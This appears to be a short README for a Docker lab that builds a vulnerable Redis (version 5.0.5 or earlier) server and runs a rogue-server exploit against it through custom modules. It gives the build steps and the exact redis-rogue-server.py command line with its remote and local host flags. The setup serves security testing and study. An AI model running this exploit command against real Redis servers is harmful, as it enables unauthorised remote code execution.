Testbed for Redis <= 5.0.5 exploit using custom modules
Build the exploit and a vulnerable server
make
Connect to the PoC container
docker exec -it redis-poc bash
Execute the exploit
./redis-rogue-server.py --rhost redis-vulnerable --lhost redis-poc
make clean